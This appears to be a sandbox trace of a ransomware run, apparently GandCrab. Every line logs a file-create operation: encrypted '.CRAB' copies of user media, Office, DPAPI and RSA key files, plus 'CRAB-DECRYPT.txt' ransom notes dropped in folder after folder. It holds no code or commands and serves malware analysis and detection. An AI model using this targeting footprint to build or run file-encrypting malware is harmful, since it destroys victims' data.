Create	C:\System Volume Information\SPP\SppGroupCache\{C4C23D0F-5069-470F-9760-27EB797F66C2}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{C861246C-5D84-4FF4-A753-BAD4631D65CA}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{CB7F5435-7D84-4F72-A889-A21E062F0CB6}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{DBAB67DA-647A-401E-A02B-58C06249C638}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{DBAB67DA-647A-401E-A02B-58C06249C638}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{EE224D27-954D-4040-87C6-066B5517487C}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{EE224D27-954D-4040-87C6-066B5517487C}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\Syscache.hve.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\Syscache.hve.LOG1.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\tracking.log.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\-DayvP7JqPOz.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\10sVmj P4.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\31din7ow5vkoebLqCd.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\4DhKp-3wYPgXudWxJ9.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\4sWrkh0 cpz.ppt.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\5 rDjfI9.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Flash Player\AssetCache\D5NTRC6R\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DnI50I2_-.odp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DoCM.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\DXrQjHb s_ge7HCAM.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\eKFqn-s.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\hR9Jmg2bcuzAyr3E4P.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\MA1411.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7Y3F7QB\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3388679973-3930757225-3770151564-1000\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IME12\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP12\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP8_1\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP9_0\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\65UX3YG0\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\AY721QDR\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\DZBKZBIC\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\VRLZOZ0E\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project\14\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project\14\1033\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\Global.LNK.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\02540a10-7eb7-4b20-a8c7-470f8986389c.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\2be989a0-16a1-424b-9211-51aa3bb43e5d.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3388679973-3930757225-3770151564-1000\fbbe72db-afd8-443b-88dd-64b20388700d.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect\SYNCHIST.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
